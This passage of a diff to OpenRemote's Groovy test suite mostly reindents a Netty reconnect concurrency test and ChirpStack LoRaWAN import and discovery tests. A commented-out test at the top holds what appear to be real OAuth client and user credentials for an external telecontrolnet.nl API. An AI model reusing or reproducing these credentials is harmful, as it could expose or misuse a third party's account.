-//                "https://www.telecontrolnet.nl/oauth/token",
-//                "Ha7xO3cCNtNQDdx2bhY7.openremote.org",
-//                "9ACGpDbVkirUpsh7df0e",
-//                null,
-//                "developers@openremote.io",
-//                "M5HtdBiRUCi4GKOoRNVL"
-//            )
-//        )
-//            .build()
-//
-//        when: "A request is made to an endpoint on that server"
-//        def response = target.path("locations").request().get()
-//
-//        then: "The response should be 200 OK"
-//        def str = response.readEntity(String.class);
-//        assert response.getStatus() == 200
-//    }
+  //    def "Check real OAuth resource owner credentials (password) grant authentication"() {
+  //
+  //        given: "A web target for a server requiring OAuth 'password' grant authentication"
+  //        def target = new WebTargetBuilder("client, new URIBuilder(https://www.telecontrolnet.nl/api/v1").build())
+  //            .setOAuthAuthentication(
+  //            new OAuthPasswordGrant(
+  //                "https://www.telecontrolnet.nl/oauth/token",
+  //                "Ha7xO3cCNtNQDdx2bhY7.openremote.org",
+  //                "9ACGpDbVkirUpsh7df0e",
+  //                null,
+  //                "developers@openremote.io",
+  //                "M5HtdBiRUCi4GKOoRNVL"
+  //            )
+  //        )
+  //            .build()
+  //
+  //        when: "A request is made to an endpoint on that server"
+  //        def response = target.path("locations").request().get()
+  //
+  //        then: "The response should be 200 OK"
+  //        def str = response.readEntity(String.class);
+  //        assert response.getStatus() == 200
+  //    }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/io/NettyIOClientTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/io/NettyIOClientTest.groovy
@@ -34,83 +34,83 @@ import java.util.concurrent.atomic.AtomicInteger
 
 class NettyIOClientTest extends Specification implements ManagerContainerTrait {
 
-    def "Concurrency test for reconnect logic"() {
+  def "Concurrency test for reconnect logic"() {
 
-        given: "A NettyIOClient that pauses before scheduling connection"
-        // Speed up the retry interval for the test
-        def oldDelay = AbstractNettyIOClient.RECONNECT_DELAY_INITIAL_MILLIS
-        AbstractNettyIOClient.RECONNECT_DELAY_INITIAL_MILLIS = 10
+    given: "A NettyIOClient that pauses before scheduling connection"
+    // Speed up the retry interval for the test
+    def oldDelay = AbstractNettyIOClient.RECONNECT_DELAY_INITIAL_MILLIS
+    AbstractNettyIOClient.RECONNECT_DELAY_INITIAL_MILLIS = 10
 
-        def pauseLatch = new CountDownLatch(1)
-        def startChannelCount = new AtomicInteger(0)
+    def pauseLatch = new CountDownLatch(1)
+    def startChannelCount = new AtomicInteger(0)
 
-        def client = new WebsocketIOClient(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=random").build(),
-                null,
-                new OAuthClientCredentialsGrant("http://127.0.0.1:$serverPort/auth/realms/random/protocol/openid-connect/token",
-                        'abcd',
-                        'abcd',
-                        null).setBasicAuthHeader(true)
-        ) {
-            @Override
-            protected CompletableFuture<Void> startChannel() {
+    def client = new WebsocketIOClient(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=random").build(),
+            null,
+            new OAuthClientCredentialsGrant("http://127.0.0.1:$serverPort/auth/realms/random/protocol/openid-connect/token",
+            'abcd',
+            'abcd',
+            null).setBasicAuthHeader(true)
+            ) {
+              @Override
+              protected CompletableFuture<Void> startChannel() {
                 startChannelCount.incrementAndGet()
                 // Simulate failure because resources (bootstrap) are destroyed by disconnect()
                 if (this.bootstrap == null) {
-                    throw new NullPointerException("Bootstrap is null")
+                  throw new NullPointerException("Bootstrap is null")
                 }
                 // Return a dummy future (won't be reached if exception thrown above)
                 def future = CompletableFuture.failedFuture(new Exception("Fail"))
                 return future
-            }
+              }
 
-            @Override
-            protected void scheduleDoConnect(long initialDelay) {
+              @Override
+              protected void scheduleDoConnect(long initialDelay) {
                 // Pause here to simulate concurrency issue during connect/reconnect.
                 // We pause here after connect() has set status to CONNECTING and initialized bootstrap,
                 // but BEFORE the retry future is created and assigned to 'connectRetry'.
                 try {
-                    pauseLatch.await()
+                  pauseLatch.await()
                 } catch (InterruptedException e) {
-                    e.printStackTrace()
+                  e.printStackTrace()
                 }
                 super.scheduleDoConnect(initialDelay)
+              }
             }
-        }
 
-        // Use a dedicated executor for the retry logic
-        client.executorService = Executors.newCachedThreadPool()
+    // Use a dedicated executor for the retry logic
+    client.executorService = Executors.newCachedThreadPool()
 
-        when: "Connect is called in a separate thread"
-        Thread.start {
-            client.connect()
-        }
-
-        // Wait until the client enters the connecting state (and hits the pauseLatch)
-        new PollingConditions().eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTING
-        }
-        // Small sleep to ensure we are waiting on the latch inside scheduleDoConnect
-        Thread.sleep(100)
-
-        and: "Disconnect is called immediately by the main thread"
-        // This runs while the other thread is paused.
-        // Crucially, 'connectRetry' is still null in the client, so disconnect() fails to cancel any future.
-        // It destroys the bootstrap and sets status to DISCONNECTED.
-        client.disconnect()
-
-        then: "Client status is DISCONNECTED"
-        client.connectionStatus == ConnectionStatus.DISCONNECTED
-
-        when: "The paused connect thread is allowed to proceed"
-        pauseLatch.countDown()
-
-        then: "No attempt should be made to actually start the channel"
-        new PollingConditions(initialDelay: 1, timeout: 5, delay: 2).eventually {
-            assert startChannelCount.get() == 0
-        }
-
-        cleanup:
-        AbstractNettyIOClient.RECONNECT_DELAY_INITIAL_MILLIS = oldDelay
+    when: "Connect is called in a separate thread"
+    Thread.start {
+      client.connect()
     }
+
+    // Wait until the client enters the connecting state (and hits the pauseLatch)
+    new PollingConditions().eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTING
+    }
+    // Small sleep to ensure we are waiting on the latch inside scheduleDoConnect
+    Thread.sleep(100)
+
+    and: "Disconnect is called immediately by the main thread"
+    // This runs while the other thread is paused.
+    // Crucially, 'connectRetry' is still null in the client, so disconnect() fails to cancel any future.
+    // It destroys the bootstrap and sets status to DISCONNECTED.
+    client.disconnect()
+
+    then: "Client status is DISCONNECTED"
+    client.connectionStatus == ConnectionStatus.DISCONNECTED
+
+    when: "The paused connect thread is allowed to proceed"
+    pauseLatch.countDown()
+
+    then: "No attempt should be made to actually start the channel"
+    new PollingConditions(initialDelay: 1, timeout: 5, delay: 2).eventually {
+      assert startChannelCount.get() == 0
+    }
+
+    cleanup:
+    AbstractNettyIOClient.RECONNECT_DELAY_INITIAL_MILLIS = oldDelay
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/lorawan/chirpstack/ChirpStackTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/lorawan/chirpstack/ChirpStackTest.groovy
@@ -73,425 +73,443 @@ import static org.openremote.setup.integration.model.asset.ChirpStackTestAsset.*
 
 class ChirpStackTest extends Specification implements ManagerContainerTrait {
 
-    static final String APPLICATION_ID = "807036d9-9d96-4305-82c9-92f681a11908"
-    static final String CLIENT_ID = "chirpstackAgentClientId"
-    static final String DEV_EUI_1 = "1111111111111111"
-    static final String DEV_EUI_2 = "2222222222222222"
-    static final String ASSET_NAME_1 = "Test Asset 1"
-    static final String ASSET_NAME_2 = "Test Asset 2"
-    static final String VENDOR_ID  = "dragino"
-    static final String MODEL_ID = "lht65"
-    static final String FIRMWARE_VERSION = "1.8"
-    static final String HOST = "localhost"
-    static final Integer UPLINK_PORT = 2
-    static final Integer DOWNLINK_PORT = 4
-    static final Double TEMPERATURE_VALUE = 20.4
-    static final Double HUMIDITY_VALUE = 56.4
-    static final String PROFILE_ID = "4711"
-    static final String API_KEY = "123456789ABCDEFG"
+  static final String APPLICATION_ID = "807036d9-9d96-4305-82c9-92f681a11908"
+  static final String CLIENT_ID = "chirpstackAgentClientId"
+  static final String DEV_EUI_1 = "1111111111111111"
+  static final String DEV_EUI_2 = "2222222222222222"
+  static final String ASSET_NAME_1 = "Test Asset 1"
+  static final String ASSET_NAME_2 = "Test Asset 2"
+  static final String VENDOR_ID = "dragino"
+  static final String MODEL_ID = "lht65"
+  static final String FIRMWARE_VERSION = "1.8"
+  static final String HOST = "localhost"
+  static final Integer UPLINK_PORT = 2
+  static final Integer DOWNLINK_PORT = 4
+  static final Double TEMPERATURE_VALUE = 20.4
+  static final Double HUMIDITY_VALUE = 56.4
+  static final String PROFILE_ID = "4711"
+  static final String API_KEY = "123456789ABCDEFG"
 
-    @Shared
-    int mqttBrokerPort
+  @Shared
+  int mqttBrokerPort
 
-    @Shared
-    Server mqttBroker
+  @Shared
+  Server mqttBroker
 
-    @Shared
-    SubscriptionTracker subTracker
+  @Shared
+  SubscriptionTracker subTracker
 
-    @Shared
-    int grpcPort
+  @Shared
+  int grpcPort
 
-    @Shared
-    ChirpStackGrpcServer grpcServer
+  @Shared
+  ChirpStackGrpcServer grpcServer
 
-    @Shared
-    Mqtt3AsyncClient mqttClient
+  @Shared
+  Mqtt3AsyncClient mqttClient
 
-    def setupSpec() {
-        mqttBrokerPort = findEphemeralPort()
-        def props = new Properties()
-        props.setProperty('port', mqttBrokerPort.toString())
-        props.setProperty('persistence_enabled', 'false')
-        def config = new MemoryConfig(props)
-        subTracker = new SubscriptionTracker()
-        mqttBroker = new Server()
-        mqttBroker.startServer(config, [subTracker])
+  def setupSpec() {
+    mqttBrokerPort = findEphemeralPort()
+    def props = new Properties()
+    props.setProperty('port', mqttBrokerPort.toString())
+    props.setProperty('persistence_enabled', 'false')
+    def config = new MemoryConfig(props)
+    subTracker = new SubscriptionTracker()
+    mqttBroker = new Server()
+    mqttBroker.startServer(config, [subTracker])
 
-        grpcPort = findEphemeralPort()
-        grpcServer = new ChirpStackGrpcServer(grpcPort)
-        grpcServer.start()
+    grpcPort = findEphemeralPort()
+    grpcServer = new ChirpStackGrpcServer(grpcPort)
+    grpcServer.start()
 
-        mqttClient = MqttClient.builder()
+    mqttClient = MqttClient.builder()
             .useMqttVersion3()
             .identifier("testClientId")
             .serverHost(HOST)
             .serverPort(mqttBrokerPort)
             .buildAsync()
-        mqttClient.connect().get(2, TimeUnit.SECONDS)
+    mqttClient.connect().get(2, TimeUnit.SECONDS)
+  }
+
+  def cleanupSpec() {
+    mqttClient?.disconnect()
+    mqttBroker?.stopServer()
+    grpcServer?.stop()
+  }
+
+  def setup() {
+    subTracker?.subscriptions.clear()
+  }
+
+  def "ChirpStack CSV Import Test"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a ChirpStack agent is created"
+    def agent = new ChirpStackAgent("ChirpStackAgent")
+    agent.setRealm(MASTER_REALM)
+    agent.setMqttHost(HOST)
+    agent.setMqttPort(mqttBrokerPort)
+    agent.setClientId(CLIENT_ID)
+    agent.setApplicationId(APPLICATION_ID)
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((ChirpStackProtocol)agentService.getProtocolInstance(agent.id)) != null
     }
 
-    def cleanupSpec() {
-        mqttClient?.disconnect()
-        mqttBroker?.stopServer()
-        grpcServer?.stop()
+    and: "the connection status should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id)
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def setup() {
-        subTracker?.subscriptions.clear()
-    }
-
-    def "ChirpStack CSV Import Test"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-
-        and: "a ChirpStack agent is created"
-        def agent = new ChirpStackAgent("ChirpStackAgent")
-        agent.setRealm(MASTER_REALM)
-        agent.setMqttHost(HOST)
-        agent.setMqttPort(mqttBrokerPort)
-        agent.setClientId(CLIENT_ID)
-        agent.setApplicationId(APPLICATION_ID)
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((ChirpStackProtocol)agentService.getProtocolInstance(agent.id)) != null
-        }
-
-        and: "the connection status should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id)
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "an authenticated admin user"
-        def accessToken = authenticate(
+    when: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        and: "CSV import is executed"
-        def csvContent = """\
+    and: "CSV import is executed"
+    def csvContent = """\
             ${DEV_EUI_1},${ASSET_NAME_1},ChirpStackTestAsset,${VENDOR_ID},${MODEL_ID},${FIRMWARE_VERSION}
             ${DEV_EUI_2},${ASSET_NAME_2},ChirpStackTestAsset,${VENDOR_ID},${MODEL_ID},${FIRMWARE_VERSION}
         """.stripIndent()
-        def fileInfo = new FileInfo("devices.csv", csvContent, false)
-        AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), null, fileInfo)
+    def fileInfo = new FileInfo("devices.csv", csvContent, false)
+    AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), null, fileInfo)
 
-        then: "new assets should have been imported"
-        conditions.eventually {
-            assert assets != null
-            assert assets.length == 2
-            def node1 = assets.find { it.asset.getAttribute(DEV_EUI).map { DEV_EUI_1.equalsIgnoreCase(it.value.get()) }.orElse(false) }
-            def node2 = assets.find { it.asset.getAttribute(DEV_EUI).map { DEV_EUI_2.equalsIgnoreCase(it.value.get()) }.orElse(false) }
-            assert node1 != null
-            assert node2 != null
-            def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            def asset2 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
-            assert asset1 != null
-            assert asset2 != null
-        }
+    then: "new assets should have been imported"
+    conditions.eventually {
+      assert assets != null
+      assert assets.length == 2
+      def node1 = assets.find {
+        it.asset.getAttribute(DEV_EUI).map {
+          DEV_EUI_1.equalsIgnoreCase(it.value.get())
+        }.orElse(false)
+      }
+      def node2 = assets.find {
+        it.asset.getAttribute(DEV_EUI).map {
+          DEV_EUI_2.equalsIgnoreCase(it.value.get())
+        }.orElse(false)
+      }
+      assert node1 != null
+      assert node2 != null
+      def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      def asset2 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
+      assert asset1 != null
+      assert asset2 != null
+    }
 
-        and: "MQTT wildcard subscription should have been registered"
-        conditions.eventually {
-            assert subTracker.containsTopic("application/${APPLICATION_ID}/device/+/event/up")
-        }
+    and: "MQTT wildcard subscription should have been registered"
+    conditions.eventually {
+      assert subTracker.containsTopic("application/${APPLICATION_ID}/device/+/event/up")
+    }
 
-        when: "the device sends a LoRaWAN uplink message"
-        def json = [
-            fPort: UPLINK_PORT,
-            object: [
-                Temperature: TEMPERATURE_VALUE,
-                Humidity: HUMIDITY_VALUE,
-                Errors: ["error1", "error2"]
-            ]
-        ]
-        mqttClient.publishWith()
+    when: "the device sends a LoRaWAN uplink message"
+    def json = [
+      fPort: UPLINK_PORT,
+      object: [
+        Temperature: TEMPERATURE_VALUE,
+        Humidity: HUMIDITY_VALUE,
+        Errors: ["error1", "error2"]
+      ]
+    ]
+    mqttClient.publishWith()
             .topic("application/${APPLICATION_ID}/device/${DEV_EUI_1}/event/up")
             .payload(JsonOutput.toJson(json).bytes)
             .send()
 
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
-            assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
-            assertAttribute(asset, ERRORS) { value ->
-                assert value.startsWith("[") && value.endsWith("]")
-                assert value.contains("error1") && value.contains("error2")
-            }
-        }
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
+      assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
+      assertAttribute(asset, ERRORS) { value ->
+        assert value.startsWith("[") && value.endsWith("]")
+        assert value.contains("error1") && value.contains("error2")
+      }
+    }
 
-        when: "an asset attribute value is written"
-        def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-        def downlinkMessages = new CopyOnWriteArrayList<String>()
-        mqttClient.subscribeWith()
+    when: "an asset attribute value is written"
+    def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+    def downlinkMessages = new CopyOnWriteArrayList<String>()
+    mqttClient.subscribeWith()
             .topicFilter("application/${APPLICATION_ID}/device/${DEV_EUI_1}/command/down")
             .callback { Mqtt3Publish publish ->
-                downlinkMessages.add(new String(publish.payloadAsBytes))
+              downlinkMessages.add(new String(publish.payloadAsBytes))
             }
             .send()
             .get(5, TimeUnit.SECONDS)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
 
-        then: "a LoRaWAN downlink message should have been published"
-        conditions.eventually {
-            assert downlinkMessages.size() == 1
-            def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
-            assert downlinkMessage != null
-            assert downlinkMessage.devEui == DEV_EUI_1
-            assert downlinkMessage.fPort == DOWNLINK_PORT
-            assert downlinkMessage.data == "DAE="
-        }
+    then: "a LoRaWAN downlink message should have been published"
+    conditions.eventually {
+      assert downlinkMessages.size() == 1
+      def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
+      assert downlinkMessage != null
+      assert downlinkMessage.devEui == DEV_EUI_1
+      assert downlinkMessage.fPort == DOWNLINK_PORT
+      assert downlinkMessage.data == "DAE="
+    }
+  }
+
+  def "ChirpStack Auto Discovery Test"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a ChirpStack agent is created"
+    def agent = new ChirpStackAgent("ChirpStackAgent")
+    agent.setRealm(MASTER_REALM)
+    agent.setMqttHost(HOST)
+    agent.setMqttPort(mqttBrokerPort)
+    agent.setHost(HOST)
+    agent.setPort(grpcPort)
+    agent.setClientId(CLIENT_ID)
+    agent.setApplicationId(APPLICATION_ID)
+    agent.setApiKey(API_KEY)
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((ChirpStackProtocol)agentService.getProtocolInstance(agent.id)) != null
     }
 
-    def "ChirpStack Auto Discovery Test"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    and: "the connection status should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id)
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-
-        and: "a ChirpStack agent is created"
-        def agent = new ChirpStackAgent("ChirpStackAgent")
-        agent.setRealm(MASTER_REALM)
-        agent.setMqttHost(HOST)
-        agent.setMqttPort(mqttBrokerPort)
-        agent.setHost(HOST)
-        agent.setPort(grpcPort)
-        agent.setClientId(CLIENT_ID)
-        agent.setApplicationId(APPLICATION_ID)
-        agent.setApiKey(API_KEY)
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((ChirpStackProtocol)agentService.getProtocolInstance(agent.id)) != null
-        }
-
-        and: "the connection status should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id)
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "an authenticated admin user"
-        def accessToken = authenticate(
+    when: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        AssetTreeNode[] assets = agentResource.doProtocolAssetDiscovery(null, agent.getId(), null)
+    AssetTreeNode[] assets = agentResource.doProtocolAssetDiscovery(null, agent.getId(), null)
 
-        then: "new assets should have been discovered"
-        conditions.eventually {
-            assert assets != null
-            assert assets.length == 2
-            def node1 = assets.find { it.asset.getAttribute(DEV_EUI).map { DEV_EUI_1.equalsIgnoreCase(it.value.get()) }.orElse(false) }
-            def node2 = assets.find { it.asset.getAttribute(DEV_EUI).map { DEV_EUI_2.equalsIgnoreCase(it.value.get()) }.orElse(false) }
-            assert node1 != null
-            assert node2 != null
-            def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            def asset2 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
-            assert asset1 != null
-            assert asset2 != null
-        }
+    then: "new assets should have been discovered"
+    conditions.eventually {
+      assert assets != null
+      assert assets.length == 2
+      def node1 = assets.find {
+        it.asset.getAttribute(DEV_EUI).map {
+          DEV_EUI_1.equalsIgnoreCase(it.value.get())
+        }.orElse(false)
+      }
+      def node2 = assets.find {
+        it.asset.getAttribute(DEV_EUI).map {
+          DEV_EUI_2.equalsIgnoreCase(it.value.get())
+        }.orElse(false)
+      }
+      assert node1 != null
+      assert node2 != null
+      def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      def asset2 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_2.toUpperCase()))
+      assert asset1 != null
+      assert asset2 != null
+    }
 
-        and: "MQTT wildcard subscription should have been registered"
-        conditions.eventually {
-            assert subTracker.containsTopic("application/${APPLICATION_ID}/device/+/event/up")
-        }
+    and: "MQTT wildcard subscription should have been registered"
+    conditions.eventually {
+      assert subTracker.containsTopic("application/${APPLICATION_ID}/device/+/event/up")
+    }
 
-        when: "the device sends a LoRaWAN uplink message"
-        def json = [
-            fPort: UPLINK_PORT,
-            object: [
-                Temperature: TEMPERATURE_VALUE,
-                Humidity: HUMIDITY_VALUE,
-                Errors: ["error1", "error2"]
-            ]
-        ]
-        mqttClient.publishWith()
+    when: "the device sends a LoRaWAN uplink message"
+    def json = [
+      fPort: UPLINK_PORT,
+      object: [
+        Temperature: TEMPERATURE_VALUE,
+        Humidity: HUMIDITY_VALUE,
+        Errors: ["error1", "error2"]
+      ]
+    ]
+    mqttClient.publishWith()
             .topic("application/${APPLICATION_ID}/device/${DEV_EUI_1}/event/up")
             .payload(JsonOutput.toJson(json).bytes)
             .send()
 
-        then: "asset attribute values should be updated"
-        conditions.eventually {
-            def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-            assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
-            assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
-            assertAttribute(asset, ERRORS) { value ->
-                assert value.startsWith("[") && value.endsWith("]")
-                assert value.contains("error1") && value.contains("error2")
-            }
-        }
+    then: "asset attribute values should be updated"
+    conditions.eventually {
+      def asset = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+      assertAttribute(asset, TEMPERATURE, TEMPERATURE_VALUE)
+      assertAttribute(asset, RELATIVE_HUMIDITY, HUMIDITY_VALUE)
+      assertAttribute(asset, ERRORS) { value ->
+        assert value.startsWith("[") && value.endsWith("]")
+        assert value.contains("error1") && value.contains("error2")
+      }
+    }
 
-        when: "an asset attribute value is written"
-        def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
-        def downlinkMessages = new CopyOnWriteArrayList<String>()
-        mqttClient.subscribeWith()
+    when: "an asset attribute value is written"
+    def asset1 = assetStorageService.find(new AssetQuery().attributeValue(ATTRIBUTE_NAME_DEV_EUI, DEV_EUI_1.toUpperCase()))
+    def downlinkMessages = new CopyOnWriteArrayList<String>()
+    mqttClient.subscribeWith()
             .topicFilter("application/${APPLICATION_ID}/device/${DEV_EUI_1}/command/down")
             .callback { Mqtt3Publish publish ->
-                downlinkMessages.add(new String(publish.payloadAsBytes))
+              downlinkMessages.add(new String(publish.payloadAsBytes))
             }
             .send()
             .get(5, TimeUnit.SECONDS)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(asset1.id, SWITCH, true))
 
-        then: "a LoRaWAN downlink message should have been published"
-        conditions.eventually {
-            assert downlinkMessages.size() == 1
-            def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
-            assert downlinkMessage != null
-            assert downlinkMessage.devEui == DEV_EUI_1
-            assert downlinkMessage.fPort == DOWNLINK_PORT
-            assert downlinkMessage.data == "DAE="
-        }
+    then: "a LoRaWAN downlink message should have been published"
+    conditions.eventually {
+      assert downlinkMessages.size() == 1
+      def downlinkMessage = new JsonSlurper().parseText(downlinkMessages.get(0))
+      assert downlinkMessage != null
+      assert downlinkMessage.devEui == DEV_EUI_1
+      assert downlinkMessage.fPort == DOWNLINK_PORT
+      assert downlinkMessage.data == "DAE="
+    }
+  }
+
+  <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, T expectedValue) {
+    def attrOpt = asset.getAttribute(descriptor)
+    assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
+
+    def valueOpt = attrOpt.get().value
+    assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
+
+    assert valueOpt.get() == expectedValue : "Expected ${expectedValue} but found ${valueOpt.get()}"
+  }
+
+  <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, Closure validation) {
+    def attrOpt = asset.getAttribute(descriptor)
+    assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
+
+    def valueOpt = attrOpt.get().value
+    assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
+
+    validation(valueOpt.get())
+  }
+
+  static class ChirpStackGrpcServer {
+    private final int port
+    private io.grpc.Server server
+
+    ChirpStackGrpcServer(int port) {
+      this.port = port
     }
 
-    <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, T expectedValue) {
-        def attrOpt = asset.getAttribute(descriptor)
-        assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
-
-        def valueOpt = attrOpt.get().value
-        assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
-
-        assert valueOpt.get() == expectedValue : "Expected ${expectedValue} but found ${valueOpt.get()}"
+    void start() {
+      server = ServerBuilder.forPort(port)
+              .addService(new DeviceService())
+              .addService(new DeviceProfileService())
+              .build()
+              .start()
     }
 
-    <T> void assertAttribute(Asset asset, AttributeDescriptor<T> descriptor, Closure validation) {
-        def attrOpt = asset.getAttribute(descriptor)
-        assert attrOpt.isPresent() : "Attribute ${descriptor} is missing"
-
-        def valueOpt = attrOpt.get().value
-        assert valueOpt.isPresent() : "Value for attribute ${descriptor} is missing (it's empty)"
-
-        validation(valueOpt.get())
+    void stop() {
+      if (server != null) {
+        server.shutdownNow()
+      }
     }
 
-    static class ChirpStackGrpcServer {
-        private final int port
-        private io.grpc.Server server
-
-        ChirpStackGrpcServer(int port) {
-            this.port = port
-        }
-
-        void start() {
-            server = ServerBuilder.forPort(port)
-                .addService(new DeviceService())
-                .addService(new DeviceProfileService())
+    private static class DeviceService extends DeviceServiceGrpc.DeviceServiceImplBase {
+      @Override
